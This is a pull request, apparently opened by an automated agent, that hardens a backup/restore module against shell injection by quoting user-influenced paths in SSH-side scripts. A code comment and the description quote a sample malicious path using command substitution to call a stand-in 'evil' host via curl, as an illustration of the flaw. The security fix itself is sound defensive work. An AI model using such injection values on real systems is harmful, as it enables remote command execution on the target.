### PR TITLE
fix(backend): shellQuote user-influenced paths in systemBackup shell scripts

### DIFF
--- a/packages/backend/src/lib/systemBackup.ts
+++ b/packages/backend/src/lib/systemBackup.ts
@@ -17,6 +17,7 @@ import { logger } from './logger';
 import { listNodes, PodmanConnection } from './nodes';
 import { SSHConnectionPool } from './ssh/pool';
 import { getConfig, updateConfig } from './config';
+import { shellQuote } from './util/shellQuote';
 
 const execFileAsync = promisify(execFile);
 const BACKUP_PREFIX = 'servicebay-full';
@@ -472,6 +473,9 @@ async function stageRemoteSystemd(node: PodmanConnection, destination: string): 
     const conn = await SSHConnectionPool.getInstance().getConnection(node.Name);
     const script = [
         'set -e',
+        // REMOTE_SYSTEMD_DIR contains the literal "$HOME" sentinel that
+        // the remote shell must expand — intentionally NOT shellQuote'd.
+        // See note in restoreRemoteSystemd; same constraint applies.
         `target=${REMOTE_SYSTEMD_DIR}`,
         'if [ ! -d "$target" ]; then',
         '  echo "SYSTEMD_DIR_MISSING" >&2',
@@ -497,7 +501,7 @@ async function stageRemoteSystemd(node: PodmanConnection, destination: string): 
     const localTemp = path.join(destination, 'systemd.tgz');
     await fs.mkdir(destination, { recursive: true });
     await downloadRemoteFile(conn, remoteTemp, localTemp);
-    await execRemoteCommand(conn, `rm -f "${remoteTemp}"`);
+    await execRemoteCommand(conn, `rm -f ${shellQuote(remoteTemp)}`);
     await safeTarExtract(localTemp, destination);
     await fs.rm(localTemp, { force: true });
     return 'copied';
@@ -591,8 +595,12 @@ async function restoreRemoteSystemd(node: PodmanConnection, sourceDir: string) {
     // mirrors the local `assertSafeArchiveEntries` pre-check.
     const extractScript = [
         'set -e',
+        // REMOTE_SYSTEMD_DIR is a constant containing the literal "$HOME"
+        // sentinel — the remote shell must expand it, so we intentionally
+        // do NOT shellQuote it. If this ever becomes config-driven, switch
+        // to shellQuote + pre-resolved absolute path.
         `target=${REMOTE_SYSTEMD_DIR}`,
-        `tmp="${remoteTemp}"`,
+        `tmp=${shellQuote(remoteTemp)}`,
         // Pre-pass: refuse symlinks/hardlinks (#590) or abs/traversal entries (#580).
         // awk exits non-zero on the first offender so set -e aborts.
         `tar -tvzf "$tmp" | awk '/^[lh]/ { print "Refused archive: contains link entry: " $NF > "/dev/stderr"; exit 2 } { for (i=6; i<=NF; i++) name = (i==6 ? $i : name " " $i); if (name ~ /^\\// || name ~ /(^|\\/)\\.\\.($|\\/)/) { print "Refused archive: contains abs/traversal entry: " name > "/dev/stderr"; exit 2 } }'`,
@@ -779,7 +787,11 @@ export async function createSystemBackup(progress?: ProgressCallback): Promise<S
 
             const conn = await SSHConnectionPool.getInstance().getConnection(node.Name);
             for (const mount of proxyMounts) {
-                const checkResult = await execRemoteCommand(conn, `test -d "${mount.source}" && ls -A "${mount.source}" 2>/dev/null | head -1`);
+                // mount.source comes from parsed Quadlet YAML on the remote
+                // node. shellQuote it before any shell-template insertion —
+                // a Volume= entry with shell-metas would otherwise inject.
+                const quotedSource = shellQuote(mount.source);
+                const checkResult = await execRemoteCommand(conn, `test -d ${quotedSource} && ls -A ${quotedSource} 2>/dev/null | head -1`);
                 if (checkResult.code !== 0 || !checkResult.stdout.trim()) {
                     pushLog(logs, progress, { scope: 'remote', status: 'skip', node: node.Name, message: `${mount.source} is empty` });
                     continue;
@@ -793,7 +805,7 @@ export async function createSystemBackup(progress?: ProgressCallback): Promise<S
                 const script = [
                     'set -e',
                     `tmpfile=$(mktemp /tmp/servicebay-svcdata-XXXXXX.tar.gz)`,
-                    `tar -czf "$tmpfile" -C "${mount.source}" .`,
+                    `tar -czf "$tmpfile" -C ${quotedSource} .`,
                     `echo "$tmpfile"`
                 ].join('\n');
                 const archiveResult = await execRemoteCommand(conn, script);
@@ -802,7 +814,7 @@ export async function createSystemBackup(progress?: ProgressCallback): Promise<S
                 if (!remoteTmp) continue;
 
                 await downloadRemoteFile(conn, remoteTmp, tmpArchive);
-                await execRemoteCommand(conn, `rm -f "${remoteTmp}"`);
+                await execRemoteCommand(conn, `rm -f ${shellQuote(remoteTmp)}`);
                 await safeTarExtract(tmpArchive, localDir);
                 await fs.rm(tmpArchive, { force: true });
 
@@ -1117,7 +1129,7 @@ export async function restoreSystemBackupSelection(archivePath: string, selectio
                         const remoteSystemd = await resolveRemoteSystemdDir(conn);
                         const remotePath = path.posix.join(remoteSystemd, safePath.split(path.sep).join('/'));
                         const remoteDir = path.posix.dirname(remotePath);
-                        await execRemoteCommand(conn, `mkdir -p "${remoteDir}"`);
+                        await execRemoteCommand(conn, `mkdir -p ${shellQuote(remoteDir)}`);
                         const tempLocal = path.join(os.tmpdir(), `servicebay-restore-${Date.now()}-${path.basename(remotePath)}`);
                         await fs.copyFile(sourceFile, tempLocal);
                         await uploadRemoteFile(conn, tempLocal, remotePath);
@@ -1222,10 +1234,15 @@ export async function restoreSystemBackupSelection(archivePath: string, selectio
                         // operator-controlled `remotePath` mounts.
                         // Same SSH-side guard as restoreRemoteSystemd
                         // (#580 + #590): refuse links, abs paths, traversal.
+                        // remotePath comes from the backup metadata (entry.sourcePath)
+                        // and is user-controlled at restore time — a malicious backup
+                        // could carry a sourcePath like `"$(curl evil…)"` which would
+                        // execute via command substitution even inside double quotes.
+                        // shellQuote forces it through single-quotes (no expansion at all).
                         const remoteSvcScript = [
                             'set -e',
-                            `tmp="${remoteTmp}"`,
-                            `target="${remotePath}"`,
+                            `tmp=${shellQuote(remoteTmp)}`,
+                            `target=${shellQuote(remotePath)}`,
                             `tar -tvzf "$tmp" | awk '/^[lh]/ { print "Refused archive: contains link entry: " $NF > "/dev/stderr"; exit 2 } { for (i=6; i<=NF; i++) name = (i==6 ? $i : name " " $i); if (name ~ /^\\// || name ~ /(^|\\/)\\.\\.($|\\/)/) { print "Refused archive: contains abs/traversal entry: " name > "/dev/stderr"; exit 2 } }'`,
                             'mkdir -p "$target"',
                             'tar -xzf "$tmp" -C "$target" --no-same-owner --no-overwrite-dir --no-same-permissions',


### PR DESCRIPTION
## What
Routes user-influenced shell-template inputs in `systemBackup.ts` through `shellQuote()` so a malicious YAML `Volume=` entry or a crafted backup-metadata `sourcePath` cannot inject commands into the SSH-side backup/restore scripts.

The two real injection sinks:
1. **`mount.source`** (parsed from remote Quadlet YAML) was interpolated unescaped into `test -d "..."`, `tar -czf "..."`, and `rm -f "..."`. A `Volume=` value with shell metas would have broken out of the double-quotes.
2. **`remotePath`** (read from backup metadata at restore time) was interpolated into `target="..."` in the extract script. **Command substitution still expands inside double quotes**, so a malicious backup carrying `"$(curl evil)"` would have executed on the restore target.

Defense-in-depth quoting also applied to `remoteTemp`/`remoteTmp`/`remoteDir` (mktemp paths — can't in practice carry meta-chars, but no reason not to harden).

`REMOTE_SYSTEMD_DIR` stays unquoted with an explanatory comment — it contains the literal `\$HOME` sentinel the remote shell must expand.

## Why
Closes #1101. Tagged `security` because the inputs are *currently* maintainer-controlled but the pattern is exactly what `shellQuote` / `execSafe` were introduced to retire elsewhere in the codebase. This is opened as **draft** per the autoloop's security-gate rule — wants human eyes before merge.

## Risk
Low → medium. The behaviour is identical for any path that doesn't contain shell metas (the previous unquoted-but-double-quoted form already accepted those). The change rejects inputs that look like injection attempts. Paths with single quotes inside them (unusual) now go through the standard `'\\''` shell-escape sequence — that's still a valid POSIX path on the remote side.

## Rollback
`git revert` is enough.

## Verification
- [x] npm run lint (0 errors, 446 warnings — unchanged)
- [x] npm run check:arch (all green)
- [x] npm test (1265 passed)
- [ ] /verify on FCoS box — **owed before merge**: `packages/backend/src/lib/systemBackup.ts` is in the path-mandated set. Recommended: run one full backup + restore cycle against the live box to confirm the SSH-side scripts still execute correctly under the new quoting.

## Suggested review focus
- Are there any `mount.source` / `remotePath` callers downstream that *expect* the script to interpret shell expansion? (I don't think so — they're paths.)
- Is `REMOTE_SYSTEMD_DIR`'s `\$HOME`-as-sentinel convention worth replacing with a pre-resolved absolute path while we're here? Out of scope for this PR but a follow-up if so.